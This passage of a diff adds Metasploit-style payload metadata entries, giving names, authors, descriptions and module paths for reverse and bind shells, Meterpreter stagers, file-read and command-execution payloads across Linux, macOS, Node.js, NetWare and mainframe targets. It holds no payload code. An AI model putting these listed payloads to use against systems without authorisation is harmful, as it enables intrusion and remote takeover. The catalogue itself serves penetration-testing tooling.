false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/metsvc_bind_tcp": { + "name": "Linux Meterpreter Service, Bind TCP", + "fullname": "payload/linux/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/metsvc_reverse_tcp": { + "name": "Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/linux/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Stub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/read_file": { + "name": "Linux Read File", + "fullname": "payload/linux/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hal" + ], + "description": "Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/read_file.rb", + "is_install_path": true, + "ref_name": "linux/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell/bind_ipv6_tcp": { + "name": "Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_linux/x86/shell/bind_ipv6_tcp_uuid": { + "name": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_linux/x86/shell/bind_nonx_tcp": { + "name": "Linux Command Shell, Bind TCP Stager", + "fullname": "payload/linux/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_linux/x86/shell/bind_tcp": { + "name": "Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_linux/x86/shell/bind_tcp_uuid": { + "name": "Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/linux/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_linux/x86/shell/find_tag": { + "name": "Linux Command Shell, Find Tag Stager", + "fullname": "payload/linux/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/find_tag.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_linux/x86/shell/reverse_ipv6_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/linux/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "kris katterjohn " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_linux/x86/shell/reverse_nonx_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_linux/x86/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt ", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_linux/x86/shell/reverse_tcp_uuid": { + "name": "Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/linux/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_linux/x86/shell_bind_ipv6_tcp": { + "name": "Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/linux/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn " + ], + "description": "Listen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_bind_tcp_random_port": { + "name": "Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/linux/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_find_tag": { + "name": "Linux Command Shell, Find Tag Inline", + "fullname": "payload/linux/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle ", + "joev " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x86/shell_reverse_tcp_ipv6": { + "name": "Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/linux/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matteo Malvica " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "linux/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/zarch/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/zarch/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/zarch/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/zarch/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/zarch/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/zarch/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/zarch/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/zarch/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/zarch/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_mainframe/shell_reverse_tcp": { + "name": "Z/OS (MVS) Command Shell, Reverse TCP Inline", + "fullname": "payload/mainframe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Listen for a connection and spawn a command shell.\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", + "references": [], + "platform": "Mainframe", + "arch": "zarch", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/mainframe/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "mainframe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_multi/meterpreter/reverse_http": { + "name": "Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)", + "fullname": "payload/multi/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves" + ], + "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Multi", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/multi/reverse_http.rb", + "is_install_path": true, + "ref_name": "multi/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "multi/meterpreter", + "stager_refname": "multi/reverse_http" + }, + "payload_multi/meterpreter/reverse_https": { + "name": "Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)", + "fullname": "payload/multi/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves" + ], + "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Multi", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/multi/reverse_https.rb", + "is_install_path": true, + "ref_name": "multi/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "multi/meterpreter", + "stager_refname": "multi/reverse_https" + }, + "payload_netware/shell/reverse_tcp": { + "name": "NetWare Command Shell, Reverse TCP Stager", + "fullname": "payload/netware/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "toto" + ], + "description": "Connect to the NetWare console (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Netware", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/netware/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "netware/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "netware/shell", + "stager_refname": "netware/reverse_tcp" + }, + "payload_nodejs/shell_bind_tcp": { + "name": "Command Shell, Bind TCP (via nodejs)", + "fullname": "payload/nodejs/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Creates an interactive shell via nodejs", + "references": [], + "platform": "NodeJS", + "arch": "nodejs", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/nodejs/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "nodejs/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_nodejs/shell_reverse_tcp": { + "name": "Command Shell, Reverse TCP (via nodejs)", + "fullname": "payload/nodejs/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan", + "joev " + ], + "description": "Creates an interactive shell via nodejs", + "references": [], + "platform": "NodeJS", + "arch": "nodejs", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "nodejs/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_nodejs/shell_reverse_tcp_ssl": { + "name": "Command Shell, Reverse TCP SSL (via nodejs)", + "fullname": "payload/nodejs/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan", + "joev " + ], + "description": "Creates an interactive shell via nodejs, uses SSL", + "references": [], + "platform": "NodeJS", + "arch": "nodejs", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "nodejs/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/exec": { + "name": "OSX aarch64 Execute Command", + "fullname": "payload/osx/aarch64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "alanfoster" + ], + "description": "Execute an arbitrary command", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-12-30 16:26:31 +0000", + "path": "/modules/payloads/singles/osx/aarch64/exec.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/meterpreter/reverse_tcp": { + "name": "OSX Meterpreter, Reverse TCP Stager", + "fullname": "payload/osx/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "parchedmind", + "nologic", + "timwr", + "usiegl00" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/CylanceVulnResearch/osx_runbin", + "URL-https://github.com/nologic/shellcc" + ], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-07-31 20:30:30 +0000", + "path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "osx/aarch64/meterpreter", + "stager_refname": "osx/aarch64/reverse_tcp" + }, + "payload_osx/aarch64/meterpreter_reverse_http": { + "name": "OSX Meterpreter, Reverse HTTP Inline", + "fullname": "payload/osx/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr", + "usiegl00" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-14 15:43:40 +0000", + "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "osx/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_osx/aarch64/meterpreter_reverse_https": { + "name": "OSX Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/osx/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr", + "usiegl00" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "OSX", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-14 15:43:40 +0000", + "path": 